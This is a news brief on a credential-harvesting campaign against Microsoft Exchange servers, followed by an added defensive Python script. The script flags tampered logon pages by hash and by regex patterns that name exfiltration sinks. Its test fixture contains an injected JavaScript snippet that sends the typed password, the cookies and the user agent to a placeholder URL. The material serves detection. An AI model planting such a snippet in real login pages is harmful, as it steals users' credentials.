Identity, Threat Intelligence

Global credential harvesting campaign hits Microsoft Exchange servers

Internet-exposed Microsoft Exchange servers belonging to 65 organizations around the world have been compromised with two different types of keyloggers enabling credential exfiltration, according to The Hacker News.

According to a report from Positive Technologies, the attackers exploited the ProxyShell and ProxyLogon vulnerabilities, an Exchange Server remote code execution bug tracked as CVE-2021-31206, the Windows SMBv3 client/server RCE tracked as CVE-2020-0796, and an IIS security feature bypass flaw tracked as CVE-2014-4078 to inject a keylogger that also pilfered user cookies and User-Agent strings. Other keyloggers exfiltrated the harvested data through a Telegram bot, a DNS tunnel, or HTTP POST requests. Government organizations were the most affected, and Vietnam, Russia, Taiwan, China, and Pakistan were the most targeted countries. "By embedding malicious code into legitimate authentication pages, attackers are able to stay undetected for long periods while capturing user credentials in plaintext," the researchers said.
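As an added defender-side example (not code from the article or from the Positive Technologies report), the following Python checks an authentication page's HTML against a known-good hash and flags inline scripts that combine a submit or keystroke hook, credential, cookie or user-agent reads, and a network sink, which is the pattern the report describes. The sample pages are constructed; on a real server it would be run over the on-disk OWA/ECP logon page files (path assumed) with a baseline hash taken from a clean installation.

```python
import hashlib
import re

# Constructed sample: a benign logon page fragment and the same page with an
# injected credential-harvesting script (exfil URL is a placeholder, not real).
CLEAN_PAGE = """<form id="logonForm" action="/owa/auth.owa" method="post">
<input name="username"><input name="password" type="password">
<script>document.getElementById("username").focus();</script>
</form>"""

INJECTED_PAGE = CLEAN_PAGE.replace("</form>", """<script>
var f = document.getElementById("logonForm");
f.onsubmit = function () {
  new Image().src = "[[EXFIL_URL]]?d=" + encodeURIComponent(
    document.getElementById("password").value + "|" + document.cookie + "|" + navigator.userAgent);
};
</script></form>""")

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
# Three traits of a harvesting hook: it fires on submit/keystrokes, it reads
# field values, cookies or the user agent, and it has a way to send data out.
CAPTURE_HOOKS = re.compile(
    r"\b(onsubmit|onkey(down|up|press)|addEventListener\s*\(\s*['\"](submit|keydown|keyup|keypress))", re.I)
CAPTURED_DATA = re.compile(r"document\.cookie|navigator\.userAgent|\.value\b", re.I)
EXFIL_SINKS = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon|new\s+Image|api\.telegram\.org)\b", re.I)


def find_suspicious_scripts(html):
    """Return the (truncated) bodies of inline scripts showing all three traits."""
    findings = []
    for match in SCRIPT_RE.finditer(html):
        body = match.group(1)
        traits = [rx.search(body) is not None for rx in (CAPTURE_HOOKS, CAPTURED_DATA, EXFIL_SINKS)]
        if all(traits):  # require all three to keep false positives low
            findings.append(body.strip()[:80])
    return findings


def page_digest(html):
    return hashlib.sha256(html.encode("utf-8")).hexdigest()


def check_page(html, baseline_digest):
    """Combine integrity check (any change at all) with content heuristics."""
    return {"modified": page_digest(html) != baseline_digest,
            "suspicious_scripts": find_suspicious_scripts(html)}


if __name__ == "__main__":
    baseline = page_digest(CLEAN_PAGE)  # would come from a clean install in practice
    print(check_page(INJECTED_PAGE, baseline))
```

The hash comparison catches any tampering, including obfuscated scripts the regexes would miss, while the heuristics explain why a changed page matters.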
